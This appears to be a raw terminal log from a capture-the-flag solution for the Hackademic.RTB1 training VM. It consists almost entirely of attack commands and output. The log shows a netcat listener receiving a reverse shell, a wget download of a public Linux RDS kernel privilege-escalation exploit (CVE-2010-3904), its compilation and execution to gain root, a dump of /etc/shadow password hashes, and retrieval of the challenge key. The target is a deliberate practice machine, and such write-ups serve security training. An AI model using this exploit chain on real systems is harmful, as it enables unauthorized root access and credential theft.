nc -l -n -v -p 80 listening on [any] 80 ... connect to [192.168.64.1] from (UNKNOWN) [192.168.64.137] 42106 Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux uid=48(apache) gid=489(apache) groups=489(apache)
cat /etc/shadow cat: /etc/shadow: Permission denied
Exploit system Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit CVE-2010-3904 by Dan Rosenberg <drosenberg@vsecurity.com> http://www.vsecurity.com/resources/advisory/20101019-1/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3904
wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c --2011-11-13 03:47:49-- http://www.vsecurity.com/download/tools/linux-rds-exploit.c Resolving www.vsecurity.com... 209.67.252.12 Connecting to www.vsecurity.com|209.67.252.12|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6435 (6.3K) [text/x-c] Saving to: `linux-rds-exploit.c' 0K ...... 100% 19.5K=0.3s 2011-11-13 03:47:50 (19.5 KB/s) - `linux-rds-exploit.c' saved [6435/6435]
gcc -o hackademic01 linux-rds-exploit.c
./hackademic01 [+] Resolved rds_proto_ops to 0xe0a21b20 [+] Resolved rds_ioctl to 0xe0a0c06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xe0a21b20 [+] Resolved rds_ioctl to 0xe0a0c06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Triggering payload... [*] Restoring function pointer...
id uid=0(root) gid=0(root) cat /etc/shadow root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7::: p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
ls /root Desktop anaconda-ks.cfg key.txt key.txt~
cp /root/key.txt /var/www/html/key.txt # lynx http://192.168.64.137/key.txt Yeah!! You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :) $_d&jgQ>>ak\#b"(Hx"o<la_% Regards, mr.pr0n || p0wnbox.Team || 2011 http://p0wnbox.com
